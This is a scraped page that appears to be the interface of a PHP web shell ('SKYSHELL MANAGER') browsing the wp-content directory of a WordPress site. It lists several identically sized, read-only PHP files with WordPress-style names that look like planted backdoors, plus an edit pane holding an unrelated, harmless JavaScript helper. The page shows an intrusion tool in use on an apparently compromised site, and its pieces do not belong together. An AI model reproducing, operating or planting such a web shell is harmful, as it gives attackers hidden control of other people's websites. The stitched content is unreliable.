📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: convertDescriptorToString.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = convertDescriptorToString; /** * Copyright (c) Meta Platforms, Inc. and affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ function convertDescriptorToString(descriptor) { switch (typeof descriptor) { case 'function': if (descriptor.name) { return descriptor.name; } break; case 'number': case 'undefined': return `${descriptor}`; case 'string': return descriptor; } throw new Error(`Invalid first argument, ${descriptor}. It must be a named class, named function, number, or string.`); }
Save